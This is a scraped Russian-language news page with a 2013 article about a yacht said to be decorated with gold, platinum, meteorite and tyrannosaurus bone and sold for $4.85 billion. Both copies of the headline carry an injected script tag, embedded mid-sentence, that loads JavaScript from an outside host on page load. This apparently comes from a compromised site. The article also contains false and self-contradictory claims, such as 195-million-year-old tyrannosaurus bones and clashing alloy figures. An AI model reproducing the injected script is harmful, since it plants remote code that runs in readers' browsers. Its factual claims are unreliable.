Запрашиваемая страница не найдена USD     CNY     EUR     JPY
Москва C
Последние новости
24 июн 2018, 17:33
По итогам мая российские автолюбители купили 149 машин премиальной марки...
Поиск

Какую марку автомобиля вы предпочитаете?

» » Кости динозавра и платина, как идеальный материал для создания роскошной яхты за $5.000.000.000

Кости динозавра и платина, как идеальный материал для создания роскошной яхты за $5.000.000.000

28 мар 2013, 09:34    ismirnov
0 комментариев    5 514 просмотров

Кости динозавра и платина, как идеальный материал <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для создания роскошной яхты за $5.000.000.000

Один бизнесмен из Малайзии - владелец уникальной яхты Baia 100 Supreme. Информация о малайзийском предпринимателе практически отсутствует, кроме того, что при строительстве эксклюзивной яхты в тридцать метров было использовано уникальное сочетание строительных материалов. В состав строительных материалов яхты вошли метеориты и кости динозавров. Также в создание яхты было вложено неизмеримое количество драгоценных металлов, а именно платины и золота.

 

Креативная команда дизайнеров спроектировала эксклюзивный декор яхты Baia 100 Supreme, вложив в оформление огромного роскошного судна более ста килограммов чистого золота и платины, которыми произвели декор палубы, перил, якоря, основания яхты и помещения для обедов.

 

Оформление одной стены спальни полностью произведено из метеорита и костей настоящего тираннозавра, которым насчитывается более 195 миллионов лет.

 

В интернете уже была информация о том, что известный дизайнер с мировым именем Стюарт Хьюз в недавнем прошлом сконструировал дом в Швейцарии, применив при этом все те же материалы, а именно платину, золото, метеориты и кости динозавров.

 

Вероятнее всего, что мобильные устройства связи и различные аксессуары, созданные из драгоценных металлов и камней уже не представляют для него особого интереса. Следует отметить, что цена новых произведений популярного креативного дизайнера намного выше, чем у предыдущих шедевров.

 

Мировая известность отмечает, что малайзийский бизнесмен пожелал иметь транспортное воздушное средство, которое будет изготовлено из данных материалов, но ему пришлось довольствоваться яхтой вместо самолета. Драгоценное воздушное средство не смогло бы даже подняться в воздухе. Именно поэтому креативный автор решил предложить богатому бизнесмену заменить самолет на другое средство передвижения, которое будет нормально функционировать, но только на воде.

 

Как отметил создатель данных шедевров, вероятнее всего,  тридцатиметровая яхта Baia 100 Supreme не будет бороздить морские просторы, потому что малайзийский предприниматель не большой ценитель плавания по морю.

 

Строительство самого судна Baia 100 Supreme происходило в Италии, а работа над декором была закончена в Малайзии. Для обустройства внешнего и внутреннего интерьера яхты креативные мастера воплотили в жизнь идею с сочетанием драгоценных металлов и золота, общее количество последнего составило 75 процентов от общего количества. Данное соотношение придало полученному сплаву удвоенную прочность, что было необходимо для ежедневного использования. 

 

Для особой прочности в оформлении яхты был использован сплав металлов, где платины было более 95 процентов из общего количества. Оставшиеся пять процентов сплава состояли из рутения, иридия, палладия и других металлов. По известной информации было известно, что на сотворение шедевра у Хьюза ушло более трех лет.

 

За уникальную бесценную яхту бизнесмен из Малайзии заплатил $4,85 млрд. Конкретная информация о владельце судна содержится в тайне, но известно, что драгоценным судном может владеть Роберт Куок, чье имя было названо журналом Forbes, как самого богатого человека в Малайзии за 2011 год.

 

Кости динозавра и платина, как идеальный материал <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для создания роскошной яхты за $5.000.000.000Огромный капитал в размере $12,5 млрд Роберт Куок сколотил на сделках по недвижимости, торговле пальмовым маслом, сахаре и перевозке грузов.

 

Еще одного претендента, которого прочат во владельцы драгоценного судна - это Ананд Кришнану. Его капитал в $9, 5 млрд вложен в оператора мобильной связи Maxis Communications.

 

Больше в Малайзии кандидатов на владение уникальной яхтой нет. Состояния остальных малайзийских миллиардеров составляют менее $5 млрд.

Читайте также
05 апр 2016, 22:35    0 комментариев
Как утверждает роботостроитель, то источником вдохновения послужили научно-фантастические мультфильмы....
Комментарии
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent